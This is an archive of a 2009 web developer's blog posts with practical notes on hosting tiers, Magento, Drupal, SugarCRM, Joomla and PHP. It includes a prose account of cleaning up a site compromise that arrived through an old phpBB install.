Tuesday, December 29, 2009

Basic Hosting Information for Everyone who wants a website

Two posts back I covered the levels of hosting, however that didn't really meet the needs of most of my clients. So I went back to the drawing board and created an article that attempts to cover all the technical details you need for your first website in an accessible format.

Read it here.

Monday, December 21, 2009

Drupal Migration

Just moved a drupal instance from a local dev server to a public production server. Was getting a 500 error but a little research showed that I needed to set a value in the .htaccess file - specifically

RewriteBase /

Monday, November 09, 2009

This diagram displays the tiers of the system required for a website. When you have a website it is running on this stack.

First to define the tiers
E) Network and Power – physical network connection and power to run a server
D) Server hardware – the actually physical server (like your desktop pc)
C) Operating system – usually Linux or Windows – allows the other software to run on the hardware
B) Server Applications – on Linux (LAMP) this usually includes Apache, MySql, and PHP. These pieces are the final level needed to run the website itself.
A) Website / Applications – this include the website itself and required applications like Joomla or Wordpress

Now let us take a look at some various hosting options.

1) Full Hosting. In this case you provide A-E
2) Co-location. In this case you buy the E from a provider. You then buy a Physical Server and they install it at their location. If something goes wrong with the network they fix it. A-D is your responsibility. You get the server all to yourself.
3) Dedicated Server. In this case you are leasing a server from them (D-E). If something goes wrong with the hardware, they fix it. You get the Physical Server all to yourself. A-C is your responsibility.
4) Virtual Private Server (VPS). In this case They have a server and you are buying a piece of it. They set the operating system. Everything above this point is your responsibility. Physical Server is shared – usually between 20 and 100 other users. Often they will also have a standard set of Server Applications that cannot be changed. Usually you can install applications. So you are responsible for A and maybe part of B. They provide B-E.
5) Shared Hosting. In this case you are leasing space on a server. They set almost everything. Sometimes you get terminal (SSH) access but usually not. You cannot install any applications. You share space on a physical server with usually 100-500 other users. You are responsible for A. They provide B-E
6) Application hosting. In this case the application is installed for you. You cannot create any new pages. You can use the specific application. You are responsible for the data. They provide A-E.

It is very important to note that each level is available through managed hosting and most are available as unmanaged hosting. What is the difference? Managed means the service provider takes care of administrative tasks. Unmanaged means it is up to you to take care of these issues. For example at the server level. If it is unmanaged then if a fan fails it is up to you to get it fixed. If it is managed – they will take care of fixing it.

1) Hardware firewall - position (Z) - Some providers offer a dedicated firewall solution. Often a Cisco or Juniper device.
2) Server Firewall - position X
3) Application Firewall - position X/W (depending on the solution)
4) Redundancy - often located at position (Y) this allows the site to keep working even if a server fails. Not available in most packages - instead you must wait for server to be replaced and restored from backup.
5) Scalability – position varies – if your needs expand can you expand the services to match.
6) Backup - may be located at positions (Y - system image), (X - server instance image (if you have 100% of server doesn’t differ from Y)), (W - website backup), (V - website data backup) depending on what we are backing up and how. Most solutions offer limited backup options.

Very few people really desire to manage the whole thing or know how to do so. If that is you – then you will definitely want to choose Full Hosting as it gives you the maximum flexibility. This is where many medium and large corporations operate.

For the rest of us – we need to pick one of the other options. Which option you choose should primarily be dictated by what you need to get done. As you work your way through the options there are two things that change.

First is how much of the server is yours – as you can see with shared hosting you get around 0.5% of the server. On a VPS you may get 5%. On a dedicated server you get 100%. There are solutions available that allow you to use multiple servers. So how much of the server is yours.

The second thing that changes is your responsibility. As you get more and more of the server – you usually also get more of the responsibility for keeping it working. Increasing to a bigger package doesn’t just give you more resources – it also gives you more options and responsibility. If you want to scale up to more resources without additional responsibility then you must go with a managed solution. This is an add-on to many packages where the hosting provider takes care of some of the administrative burden for tiers that they would not normally cover for that package. For example on a dedicated server – you are in charge of the operating system, the server applications and the website. If you pay for managed hosting they will take care of some or all of these levels for you.

Thursday, October 22, 2009

Magento related products issue

I have been working off and on with a design shop getting a new Magento multi-store instance live. The latest issue is somewhat interesting. We are currently showing a 'Related Products' column and for one of the store instances there were no checkboxes available to select a related product - after a little bit of research I found that if the item is out of stock, the checkbox will not be displayed.
For Reference..

Thursday, September 24, 2009

Twitter profile pull

One of my friends wanted to pull profile data from twitter and asked for some basic code. I am posting the mockup as it might prove interesting to someone else.

   $output = $xml_content = '';
   $tw_name = 'jeremiahstover';
   $xml_content = simplexml_load_file("http://twitter.com/users/show.xml?screen_name=$tw_name");
   $xml_content2 = simplexml_load_file("http://twitter.com/statuses/friends/$tw_name.xml");

$output .= "
               border:1px solid black;
         <div class='tw_profile'>
            <a href='". $xml_content->url ."'>
               <div class='avatar'>
                  <img src='".$xml_content->profile_image_url."'>
               <div class='avatar_title'>".$xml_content->name."</div>
            <div class='description'>".
               $xml_content->description   ."
            <div class='friends'>
               <i>  ";

               foreach($xml_content2 as $friend){
                  $name = $friend->name;
                  $url = $friend->url;
                  $output .= "<a href='$url'>$name</a><br>";

             $output .= "

echo $output;


Monday, August 31, 2009

Local Instance of Magento

I have been playing with a local instance of Magento - working on a custom template. When running on Windows (through WAMP). To get login working there must be a dot in the base site name - thus http://localhost/magento will not work - instead install to and you have a dot in the name. This issue is related to the way that cookies are handled internally and will not present any difficulty on a publicly hosted site.

Monday, August 03, 2009

Hack attack

I have been fighting an attack on the integrity of my websites for a little over a year now. At first there was no information online, but as the attack has continued I have found a few other people that suffered from the same attack. I finally decided it was time to put in the effort to track the issue down and correct it.

The attack was a code insertion in the footer of my pages. The attack script apparent searches for </body> and inserts a little piece of javascript right before it. The javascript loads a file located on one of a series of servers in china (domainname.cn).

At this point I have a shell script that I am running sporadically - searching all files on my server for the telltale indicator. It compiles a list of the files - which I then send through a second shell script which removes the attack code.

It appears the attack originated with an old instance of phpBB - which I have removed. Once the attack was successful a series of backdoor scripts were uploaded - all of which accept a posted file and then eval it. (PHP local execution). I have a second script that is looking for all instances of eval and listing them in another file - this one has to be checked by hand at this point as I have not yet selected a unique identifier for the attacking code. Once this part is cleaned up I should be clear (finally), hopefully for a while.

I am pondering things I can do in a shared hosting environment that would make this kind of attack more difficult. The best I have thought of to date is to setup a pair of scripts to set my websites to 'read only' and to 'read write'. Each time I make an update I could then unlock the files, and when I was done I could lock it back down. Without paying for a VPS, this may be the best solution. Another option would be to run a daily cron job that scans all folders for files changed in the last 24 hours. Have it compile a list and email that list to me. This way I would be notified any time a file changes. I would have to tweak the settings as there are a couple of applications that I am running that make use of temporary files. Temp files would have to be scanned to make sure they were less than x days old (where x is about 2) and deleted once they are older than that. All to prevent the temp folders from being a useful attack vector.

I suspect there is a better approach to the problem than either I have specified - even thought I am on a shared hosting account. I will give it some more thought as I have time.

Saturday, July 25, 2009

Wordpress template excerpt

I needed to add excerpt functionality to a custom WordPress theme and found the following article to be just the ticket.

Replacing Wordpress content with an excerpt without editing the theme files

Magento multi store granular permissions

Magento eCommerce allows granular permissions in there community edition. Granular permissions are accessed by creating a role and assigning users to roles. However the community editions granular permissions apply to all stores multi-store install. For granular permissions per store instance on a single install you need to purchase Enterprise which costs $8,900+ per year.

Wednesday, July 22, 2009

PHP and type casting

I was going through some of my notes and found an issue that gave me some trouble. About a year ago I was working on a custom shopping cart, and ran into trouble with PHP's type casting. I was multiplying a float (price) by an int (quantity) and PHP was converting the float to an int by dropping the decimal part of the number before doing the multiplication. Obviously this was causing trouble with the total price charged. The fix was to force the int to a float before the multiplication.
$lineTotal = (float) $price * $quantity;

Magento eCommerce

One of my clients is setting up a multi-store instance of Magento - and wanted to change each stores home page. I have not used Magento in a multi-store instance before so I had to look up the details.

Ok - here is what you want to know - I updated one of the stores - the required steps as follows
1) create a new page in the cms (named something like store-home)
2) If you have not already, create the new store
3) in admin open menu System->configuration
4) select box at top left - choose the entry 'english' under 'Maria's Botique'
5) left menu - choose 'web'
6) on right choose 'default pages'
7) modify the 'cms home page' by choosing the custom page we created in step 1
8) done

My reference material can be found here

Saturday, July 18, 2009


One of my clients is implementing an instance of SugarCRM - the recently setup several webToLead forms and wanted to require a set of fields other than the default. After poking around a little (on the documentation) I took a look at the page source. The solution proved quite simple.

<input id="req_id" name="req_id" value="first_name; last_name;webtolead_email1;" type="hidden">

As you can see - adding new id entries to the value of this field makes those fields required.
P.S. name and id appear to be set the same on every field - but the javascript appears to be using the id for verification.

Facebook advertising

One of my clients has decided to run a simple advertisement on facebook - the stats so far are interesting. We choose to go with pay per impressions to start with. The ad links through to a page on facebook, so there is a 'fan' link at the bottom of each ad.

Currently we are seeing
a) 1000 impressions per actions
b) 1.8 actions per fan
c) 8 fans per person who follows one of the links on the facebook page through to our website
d) 2 people on our website per 1 who fills out the form for the free promotional item.

This will bear watching to see how things develop as we attempt to tweak the settings

(UPDATE) We tried an ad the directed people to the website form directly instead of going through a facebook page - all that seemed to do was drop us straight down to step c - which means fewer fans but the same number of website visits per advertising $.

Development challange

I have recently been working on Joomla - running among other things an instance of Mosets tree 2.1. I have been working on a custom import from an external database. While you can get Mosets to rebuild its hierarchy using
this will not always manipulate your data into a form that Mosets can use.
I ran into trouble until I found that the root element must have an id of 0 and it must have a parent of -1. Any id other than 0 will not fail catastrophically, however it will not work properly either (I was seeing around 5% of the elements in the table showing up).

Desktop utility

I don't find myself using many windows add-ons - but this one is actually proving useful.
Stardock Fences

Business counsel

Radical Career success in a down economy - just finished listening and found many interesting points. In my opinion just about any employee or entrepreneur can benefit from many of the concepts presented.